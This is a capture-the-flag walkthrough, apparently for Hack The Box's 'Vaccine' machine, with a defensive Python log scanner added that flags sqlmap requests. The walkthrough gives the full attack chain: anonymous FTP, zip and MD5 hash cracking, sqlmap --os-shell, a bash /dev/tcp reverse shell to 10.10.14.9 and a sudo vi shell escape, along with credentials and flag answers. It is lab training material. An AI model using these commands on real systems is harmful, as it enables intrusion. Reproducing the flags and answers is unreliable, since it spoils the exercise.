Vaccine

Initial Scan

sudo nmap -T4 -Pn -sV -sC -v 10.129.248.153 -oA Vaccine

Task 1

Besides SSH and HTTP, what other service is hosted on this box?

Answer: FTP

Task 2

This service can be configured to allow login with any password for a specific username. What is that username?

Answer: anonymous

Task 3

What is the name of the file downloaded over this service?

ftp 10.129.248.153

Answer: backup.zip

Task 4

What script comes with the John The Ripper toolset and generates a hash from a password protected zip archive in a format to allow for cracking attempts?

Answer: zip2john

Task 5

What is the password for the admin user on the website?

backup.zip password: 41852963

Looking at index.html inside the archive, we find the admin password hash.

Put the hash in a file and crack it with hashcat (mode 0 is MD5):

hashcat -a 0 -m 0 hash /usr/share/wordlists/rockyou.txt

Answer: qwerty789

Task 6

What option can be passed to sqlmap to try to get command execution via the sql injection?

Looking at sqlmap -h

Answer: --os-shell

Task 7

What program can the postgres user run as root using sudo?

Get the PHPSESSID cookie from the website after logging in, then pass it to sqlmap:

sqlmap -u 'http://10.129.248.153/dashboard.php?search=any+query' --cookie="PHPSESSID=n33tru7g83ed1hqdgfm42gnqic" --os-shell

We get our shell.

Start the listener and run

bash -c "bash -i >& /dev/tcp/10.10.14.9/443 0>&1"

Answer: vi
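From the defender's side, the sqlmap run against dashboard.php above leaves a clear trail in the web server access log. The following Python script is an added example, not part of the original writeup: it scans constructed Apache combined-format log lines (timestamps, sizes and requests are made up) for the sqlmap user-agent and for injection patterns in query parameters.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample lines in Apache combined-log format (not real box logs).
SAMPLE_LOG = """\
10.10.14.9 - - [12/Jan/2024:10:00:01 +0000] "GET /dashboard.php?search=car HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.10.14.9 - - [12/Jan/2024:10:00:07 +0000] "GET /dashboard.php?search=any+query%27%20AND%201%3D1--%20 HTTP/1.1" 200 5120 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
10.10.14.9 - - [12/Jan/2024:10:00:08 +0000] "GET /dashboard.php?search=any+query%27%20AND%20%28SELECT%20pg_sleep%285%29%29--%20 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.10.14.9 - - [12/Jan/2024:10:00:09 +0000] "GET /login.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# Apache combined log format: ip ident user [time] "METHOD path PROTO" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Common SQL injection indicators in a decoded parameter value. A bare quote is
# noisy (a search for O'Brien trips it); tune the pattern for your application.
SQLI_RE = re.compile(
    r"('|\bunion\b|\bselect\b|--|/\*|\bpg_sleep\b|\bor\b\s+\d+=\d+)", re.IGNORECASE
)


def analyse(line):
    """Return a finding dict for a suspicious request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlparse(m["path"])
    reasons = []
    if "sqlmap" in m["ua"].lower():
        reasons.append("sqlmap user-agent")
    # parse_qs URL-decodes values, so %27 becomes a quote before matching.
    for name, values in parse_qs(url.query, keep_blank_values=True).items():
        if any(SQLI_RE.search(v) for v in values):
            reasons.append(f"injection pattern in '{name}'")
    return {"ip": m["ip"], "path": url.path, "reasons": reasons} if reasons else None


def flag_requests(log_text):
    """Scan a whole log and return the list of findings in order."""
    return [r for r in (analyse(l) for l in log_text.splitlines()) if r]


if __name__ == "__main__":
    for finding in flag_requests(SAMPLE_LOG):
        print(finding)
```

Changing the user-agent defeats the first check only; the parameter check still catches the payloads, which is why both are combined.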

Task 8

Submit user flag

Answer: ec9b13ca4d6229cd5cc1e09980965bf7

Task 9

Submit root flag

Looking at the files in /var/www/html, since the site uses PHP. In dashboard.php we find the database credentials:

user=postgres password=P@s5w0rd!

Looking at the shell-escape options listed for vi on GTFOBins.

Open any file with sudo vi (the only command the postgres user may run as root), then set the shell and spawn it:

:set shell=/bin/sh
ENTER
:shell
ENTER

Answer: dd6e058e814260bc70e9bbdef2715849
